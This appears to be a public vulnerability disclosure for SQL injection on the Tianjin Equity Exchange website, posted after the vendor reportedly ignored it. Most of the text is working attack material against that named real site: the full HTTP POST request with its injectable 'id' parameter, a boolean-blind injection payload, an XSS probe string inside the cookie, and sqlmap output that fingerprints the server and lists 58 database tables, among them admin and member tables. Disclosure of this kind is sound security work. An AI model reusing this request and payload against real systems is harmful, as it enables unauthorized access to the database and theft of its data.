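2015-09-24: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly.
2015-11-08: The vendor has actively ignored the vulnerability; details disclosed to the public.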
http://www.tjsoc.com/ Tianjin Equity Exchange
POST /web/more_details2.aspx HTTP/1.1
Content-Length: 239
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.tjsoc.com:80/
Cookie: ASP.NET_SessionId=u15m1orexefpacbuhkcihpg1; __utmt=1; __utma=219506396.1977036588.1443013104.1443013104.1443013104.1; __utmb=219506396.4.10.1443013104; __utmc=219506396; __utmz=219506396.1443013104.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); CheckCode=2206
Host: www.tjsoc.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBwKx8fr0DgKP6PmbAQKO6PmbAQKN6PmbAQKU6PmbAQKT6PmbAQKS6PmbAdYjvuPyabQjbKNlUiXi%2bknsyjBSanbB8KATBc8XGvqZ&__VIEWSTATE=/wEPDwUKLTE3MTM5MTc2OGRkHIz6x5shuppo6oFYZzvrzpLemXO41QcBr0a5CqauJjk%3d&id=250
The id parameter
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: __EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBwKx8fr0DgKP6PmbAQKO6PmbAQKN6PmbAQKU6PmbAQKT6PmbAQKS6PmbAdYjvuPyabQjbKNlUiXi+knsyjBSanbB8KATBc8XGvqZ&__VIEWSTATE=/wEPDwUKLTE3MTM5MTc2OGRkHIz6x5shuppo6oFYZzvrzpLemXO41QcBr0a5CqauJjk=&id=250 AND 8395=8395
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
Database: dsc130059_db
[58 tables]
+-----------------------+
| D99_Tmp               |
| Delsen_Admin          |
| Delsen_FeedBack       |
| Delsen_Group          |
| T_FAQ                 |
| T_StockCode           |
| T_StockCode_simu      |
| T_admin               |
| T_application         |
| T_article             |
| T_article_class       |
| T_consult             |
| T_consult_class       |
| T_data                |
| T_declaration         |
| T_display             |
| T_filter_main         |
| T_filter_sub          |
| T_grand               |
| T_infomation          |
| T_infomation_class    |
| T_infomation_simu     |
| T_invest              |
| T_link                |
| T_marketData          |
| T_members             |
| T_news                |
| T_notice              |
| T_others              |
| T_person              |
| T_platform            |
| T_platform_Class      |
| T_qyzx                |
| T_recruitment         |
| T_supervise           |
| T_superviseNews       |
| T_supervise_class     |
| T_sysPower            |
| T_sysUsers            |
| Table_Article         |
| Table_Class           |
| Table_JobCand         |
| Table_Log_Sys         |
| Table_Member          |
| Table_ShopOrder       |
| Table_ShopPoints      |
| cmd1                  |
| cmd2                  |
| cmd_tmp               |
| cmd_ww                |
| pcguest               |
| sysdiagrams           |
| table_temp            |
| tb_company            |
| tb_company_Main_class |
| tb_company_Sub_class  |
| tkhxx                 |
| tkhxxtemp             |
+-----------------------+
Unable to contact the vendor, or the vendor actively refused.